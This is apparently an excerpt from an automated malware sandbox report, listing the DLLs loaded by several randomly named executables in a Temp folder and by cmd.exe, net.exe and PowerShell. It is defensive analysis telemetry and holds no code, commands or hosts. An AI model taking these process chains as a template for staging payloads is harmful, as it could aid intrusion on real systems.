Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\net1.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\net1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\net1.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\net1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\net1.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\net1.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\net1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: fwpuclnt.dll
